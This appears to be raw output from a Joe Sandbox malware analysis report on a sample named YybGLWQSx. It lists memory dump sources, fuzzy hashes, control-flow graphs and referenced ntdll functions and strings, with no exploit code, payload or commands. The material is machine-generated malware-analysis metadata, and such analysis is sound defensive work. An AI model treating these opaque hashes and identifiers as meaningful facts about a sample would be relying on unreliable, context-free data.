                        • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                        • Instruction Fuzzy Hash: 12110372404284CFCB02CF10D5C4B6ABF72FB94314F24C6A9D9490B756C336E85ACBA2
                        Memory Dump Source
                        • Source File: 00000009.00000002.2203445222.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6fd000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                        • Instruction ID: d97d87ed846bab90f13478b3fb3cbda7c48f20927967aa865b021ffa21c5edbf
                        • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                        • Instruction Fuzzy Hash: 9D110372404244DFCB02CF00D5C4B66BFB2FB94324F24C2A9D9090B756C33AE85ACBA2
                        Memory Dump Source
                        • Source File: 00000009.00000002.2211676135.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_70d000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                        • Instruction ID: ce7ea5efc70e026db010a32e4b502cc6d555eec559c1c024243c8bdccfb9dfb6
                        • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                        • Instruction Fuzzy Hash: C711BB75504380CFCB21CF54D5C4B15BBA2FB88314F24C6AAD8494B696C33AD80ACBA2
                        Memory Dump Source
                        • Source File: 00000009.00000002.2211676135.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_70d000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                        • Instruction ID: 2ea773a52ac327fbdfc459aa6756ecdcbce820c9ececd061780736fc557d1428
                        • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                        • Instruction Fuzzy Hash: 8A11BB75904380DFCB12CF54D5C4B15BBA1FB84324F24C6A9D8494B696C33AD81ACB61
                        Memory Dump Source
                        • Source File: 00000009.00000002.2203445222.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6fd000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cce7299f315f6db10a54b5e7393f72382420e5ca856597df61c94f83bb34f3da
                        • Instruction ID: 332d18a85ed96b77b2d13b88cba7bad424ff2ac3ec2b349b3b9693dce4acf900
                        • Opcode Fuzzy Hash: cce7299f315f6db10a54b5e7393f72382420e5ca856597df61c94f83bb34f3da
                        • Instruction Fuzzy Hash: 5F01DB710083489AE710AF15CDC4B77BF9ADF41364F28C51AEE094E296D379A845D6B1
                        Memory Dump Source
                        • Source File: 00000009.00000002.2203445222.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_6fd000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 570fb4f29c0a4d1ac92c440ea6e3f3289734247433de45b4f6178c546fadc28b
                        • Instruction ID: 063935916b124cc069d71e088ce4fe084a73079ed3f335c922ed615ac242e89a
                        • Opcode Fuzzy Hash: 570fb4f29c0a4d1ac92c440ea6e3f3289734247433de45b4f6178c546fadc28b
                        • Instruction Fuzzy Hash: 2FF062714043449EE7109E15DD88BA2FF99EF51734F18C45AED085E296C379A845CAB1

                        Execution Graph

                        Execution Coverage:0%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:1
                        Total number of Limit Nodes:0
                        execution_graph 61896 1622c1d LdrInitializeThunk

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 1622c0a-1622c0f 1 1622c11-1622c18 0->1 2 1622c1f-1622c26 LdrInitializeThunk 0->2
                        APIs
                        • LdrInitializeThunk.NTDLL(0163FD4F,000000FF,00000024,016D6634,00000004,00000000,?,-00000018,7D810F61,?,?,015F8B12,?,?,?,?), ref: 01622C24
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 5757b8eeb315fced8404229affb36b42493b773890ecf5f22d5d392d1da97638
                        • Instruction ID: 0ecff2aca33659c0c3924ebc81bfa6ca81043a41d1ddbae41014f68c756c0c9a
                        • Opcode Fuzzy Hash: 5757b8eeb315fced8404229affb36b42493b773890ecf5f22d5d392d1da97638
                        • Instruction Fuzzy Hash: B4B09B71D019D5C5DA51E7644E08717791477D0701F15C165E2034751F4738C1D1F675

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 5 1622df0-1622dfc LdrInitializeThunk
                        APIs
                        • LdrInitializeThunk.NTDLL(0165E73E,0000005A,016BD040,00000020,00000000,016BD040,00000080,01644A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0162AE00), ref: 01622DFA
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 7c851b553deff2e51e687cfeb96a88923f544fd0e06972dd9bcb4ebfab49ed86
                        • Instruction ID: 49bc0e817323dcb92121d463c592645275d51ac61b7b22abb9bbe65dbf089442
                        • Opcode Fuzzy Hash: 7c851b553deff2e51e687cfeb96a88923f544fd0e06972dd9bcb4ebfab49ed86
                        • Instruction Fuzzy Hash: 2090023160140413D11175584904747001D97D0241F95C512B4428658ED6568A53B221

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 4 1622c1d-1622c26 LdrInitializeThunk
                        APIs
                        • LdrInitializeThunk.NTDLL(0163FD4F,000000FF,00000024,016D6634,00000004,00000000,?,-00000018,7D810F61,?,?,015F8B12,?,?,?,?), ref: 01622C24
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: e2e2c39a22a0ae5c7bfb744a03ad67fe0e47166f450796d4e4a864cf2dce9519
                        • Instruction ID: 45b5277b0fb322a7e5b41da64b53393cc993cdeeed6f6a67038f0ef4e13ac968
                        • Opcode Fuzzy Hash: e2e2c39a22a0ae5c7bfb744a03ad67fe0e47166f450796d4e4a864cf2dce9519
                        • Instruction Fuzzy Hash: 94A00231851206478241AA1448844A9A268FAE022135AC347ED068551B472D2497B671

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 6 16235c0-16235cc LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: b390988428a2ba8ea373c9417743876ba929bddfb09a57d115ea201bfda7e2cd
                        • Instruction ID: 6b0abfa080f58805b4afb7f003ea9affff3d96b21fa665befba6a9d8f8c98f6a
                        • Opcode Fuzzy Hash: b390988428a2ba8ea373c9417743876ba929bddfb09a57d115ea201bfda7e2cd
                        • Instruction Fuzzy Hash: 9A900231A0550402D10075584914747101997D0201F65C511B4428668EC7958A5276A2

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 7 42c000-42c027 9 42c02d-42c03b 7->9
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775275879.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_42c000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 683a6ba25e1ac3d0a1a754f03f7f9f0cf31e7a4c7bc42913b863bb4bf04aa763
                        • Instruction ID: 83a525731ca45fbc2d24cb8750c598b599a2673199e188f760fb8d6659ab5fd8
                        • Opcode Fuzzy Hash: 683a6ba25e1ac3d0a1a754f03f7f9f0cf31e7a4c7bc42913b863bb4bf04aa763
                        • Instruction Fuzzy Hash: 58E02621A892147BD211D214AC82FEE7768DB85300F40058BF6488A0C1D7983F508396

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 10 1624a80-1624a8b 11 1624a9f-1624aa6 10->11 12 1624a8d-1624a99 RtlDebugPrintTimes 10->12 13 1624aa8-1624aae 11->13 14 1624aaf-1624ab6 call 160f5a0 11->14 12->11 18 1624b25-1624b26 12->18 19 1624b23 14->19 20 1624ab8-1624b22 call 1611e46 * 2 14->20 19->18 20->19
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: 0Iv$0Iv$0Iv$0Iv$0Iv$0Iv
                        • API String ID: 3446177414-2083360775
                        • Opcode ID: 1bfacecb3e4eab58c881d7817dc1f7e0a0849ee764cbe8cb3629823d6c9d5200
                        • Instruction ID: 8fc65dff8950e988f81cc92074311c7217a890ad74a643380124e035393a7d15
                        • Opcode Fuzzy Hash: 1bfacecb3e4eab58c881d7817dc1f7e0a0849ee764cbe8cb3629823d6c9d5200
                        • Instruction Fuzzy Hash: 3E01B132E066216AD7349E38BC047872BE1B789729F09505EE908CB388DB714C51DBA4

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 221 1622890-16228b3 ... (graph edge list omitted; nodes call 1630050)
                        APIs
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID:
                        • API String ID: 48624451-0
                        • Opcode ID: 4492cc3960d0fc8677ae8f6184f7ea7378df4c388c007c5328718bcb9298d4e2
                        • Instruction ID: d3c6df49288c10b7ef080d3bc8b1f898abe36b88b8b289dc30a0fa0998e97aaa
                        • Opcode Fuzzy Hash: 4492cc3960d0fc8677ae8f6184f7ea7378df4c388c007c5328718bcb9298d4e2
                        • Instruction Fuzzy Hash: 0651F7B6B00526BFCB21DB9D8CA097EFBB8BB48240B54826DF465D7641D374DE04CBA0

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 274 15fa250-15fa26f ... (graph edge list omitted; nodes call 166f290, 15fa6e0, 15fa840, 15e4508 and RtlDebugPrintTimes)
                        Strings
                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 016479D0, 016479F5
                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 016479D5
                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 016479FA
                        • SsHd, xrefs: 015FA3E4
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                        • API String ID: 0-929470617
                        • Opcode ID: ad277758ac41e3be3339dbb28dccebf4984ddaf003ddfce22a8e9ae6b7a44556
                        • Instruction ID: 1bdefb15e18437b7a228223c4f0019739ecd8c79a7d22ee3b92d7f9e82dea5c9
                        • Opcode Fuzzy Hash: ad277758ac41e3be3339dbb28dccebf4984ddaf003ddfce22a8e9ae6b7a44556
                        • Instruction Fuzzy Hash: 09E1C2706043428FE725CE28C898B6ABBE1BB84354F144A2DEA69CF3D1D731D985CB53

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 398 15fd770-15fd7ab ... (graph edge list omitted; nodes call 1624c30, 166f290, 15fd660, 1628250, 16382c0, 15fa6e0, 15e4508 and RtlDebugPrintTimes)
                        APIs
                        Strings
                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 01649341, 01649366
                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01649346
                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0164936B
                        • GsHd, xrefs: 015FD874
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                        • API String ID: 3446177414-576511823
                        • Opcode ID: 5ddbeb9de10cc6ab386dc7094436a1ebb4cb69b8b9e2774832a64accd3795286
                        • Instruction ID: fd56919ff30e4df91eb93b82542bfcb023546f46c733461664b9df3dd423c379
                        • Opcode Fuzzy Hash: 5ddbeb9de10cc6ab386dc7094436a1ebb4cb69b8b9e2774832a64accd3795286
                        • Instruction Fuzzy Hash: A3E1B2716043428FDB25CF98C980B6BBBF5BF89318F044A2DEA958F281D771D944CB92

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 509 162b5ec-162b5fc ... (graph edge list omitted; nodes call 1624b87, 162b5e6, 1626810, 1626580 and 166d8b0)
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: __aulldvrm
                        • String ID: +$-$0$0
                        • API String ID: 1302938615-699404926
                        • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                        • Instruction ID: 6aec899807205976fea51f60ccfedd1828bd37497e27a9210f0ec36173eabcd9
                        • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                        • Instruction Fuzzy Hash: 3981BD30E05A7A8EEF258E6CCC917FEBBA2EF45320F1C421AD861A7391C77488418F55

                        Control-flow Graph
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: $$@
                        • API String ID: 3446177414-1194432280
                        • Opcode ID: 21bdf81b34ba5ccc3f43da9708ed9c610237d4e1b9bb1d8a324e2c037d334ca8
                        • Instruction ID: bd021465cd7f573d9d5995b0b9acdb933ad9e14a4d88cb204c6f846ce5c35c79
                        • Opcode Fuzzy Hash: 21bdf81b34ba5ccc3f43da9708ed9c610237d4e1b9bb1d8a324e2c037d334ca8
                        • Instruction Fuzzy Hash: C0811BB1D002699BDB35CB54CC54BEEBBB4BB48754F1041DAEA19B7280D7309E84CFA4

                        Control-flow Graph
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: 0Iv$0Iv$0Iv$X
                        • API String ID: 3446177414-728256981
                        • Opcode ID: 14e97215f0421b1cf23ab5cb8db38e3a05624cb36109073ca91af8ecf8b17e8a
                        • Instruction ID: 6a187c24c8547fc18f30edb3722bea538ca75866fd7dcd4782381d20cc3bb765
                        • Opcode Fuzzy Hash: 14e97215f0421b1cf23ab5cb8db38e3a05624cb36109073ca91af8ecf8b17e8a
                        • Instruction Fuzzy Hash: E9317A31E0161AEBCF228EADDC40B8D3BA1AB88759F05501DFD0496249DB708A60CF96

                        Control-flow Graph
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                        • API String ID: 3446177414-56086060
                        • Opcode ID: 40c766bce92f1705f08eb232d81b970e1ae7ba3eb6a98d560fc8fdadddede087
                        • Instruction ID: 35c15febab323fb3368af070afdf80630a7596b44ffd478444f332017b2af844
                        • Opcode Fuzzy Hash: 40c766bce92f1705f08eb232d81b970e1ae7ba3eb6a98d560fc8fdadddede087
                        • Instruction Fuzzy Hash: 56415770600A46DFD72ADFACCC85BAAB7A5FF45324F0041ACD5018B3D1CB749880C790

                        Control-flow Graph
                        APIs
                        Strings
                        • minkernel\ntdll\ldrredirect.c, xrefs: 01664899
                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01664888
                        • LdrpCheckRedirection, xrefs: 0166488F
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                        • API String ID: 3446177414-3154609507
                        • Opcode ID: 77667a52d25004895360b74f5f7420ccd157d5c5826d79f5a8d8ea61e0d039db
                        • Instruction ID: 3f32c0e1e4fbdbfc9568f0a73c85dba48647fb69d96aeff8c652237d210d989a
                        • Opcode Fuzzy Hash: 77667a52d25004895360b74f5f7420ccd157d5c5826d79f5a8d8ea61e0d039db
                        • Instruction Fuzzy Hash: CE41D132A056519FCB21CE6CDD40A66BFEDBF8AA90F06056DED49DB351DB30E810CB91
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
